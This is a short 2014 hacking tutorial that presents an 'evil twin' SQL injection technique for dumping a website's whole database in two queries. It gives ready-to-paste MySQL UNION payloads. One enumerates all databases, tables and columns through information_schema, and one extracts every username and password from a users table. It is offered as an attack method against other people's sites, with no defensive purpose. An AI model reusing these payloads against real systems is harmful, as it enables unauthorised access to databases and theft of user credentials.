In this tutorial we will learn how to do get all the data into a website in a very faster way using the SQL evil twin injection.
While using Manual SQL injection to dump the database of a site it sometimes get really complicated or a pain in the ass to get through the long procedure so The Evil Twin injection is what you need at that time.
First of all let me tell you a little background of this injection. While i was searching for something to bypass group_concat function 1024 characters limit. I found a trick using the Subquery Injection. Well thatz something old.
But this gave me an idea to complete the whole injection using subqueries and here i found the trick to complete whole database fetching in just two Evil Queries.
So we are going to Inject the Evil two after getting the columns using the order by
For Example our Injection is:
1' union select 1,2,3,4#
and we are injecting in the 4th Column
Next we will inject the First Query in the injection to get all the Database Names Followed by all Tables and Columns
The query will become :
-1' union select 1,2,3,(select (@) from (select(@:=0x00),(select (@) from (information_schema.columns) where (table_schema>[email protected]) and (@)in (@:=concat(@,0x3C,0x62,0x72,0x3E,' [ ',table_schema,' ] > ',table_name,' > ',column_name))))a)#
Now After Getting the whole data as shown blow :
where First column is Database Name, second is Table Name and the third is Column Name
So here our second Query is Ready to be injected:
-1' union all select (select (@) from (select(@:=0x00),(select (@) from (users) where (@)in (@:=concat(@,0x3C,0x62,0x72,0x3E,' [ ',username,' ] > ',pass,' > '))))a)#
And the above query will show you all the usernames and passwords in the users Table.
Thanks For reading.
I Hope you Enjoyed it.
Author : Zenodermus Javanicus
Date : 2014-03-25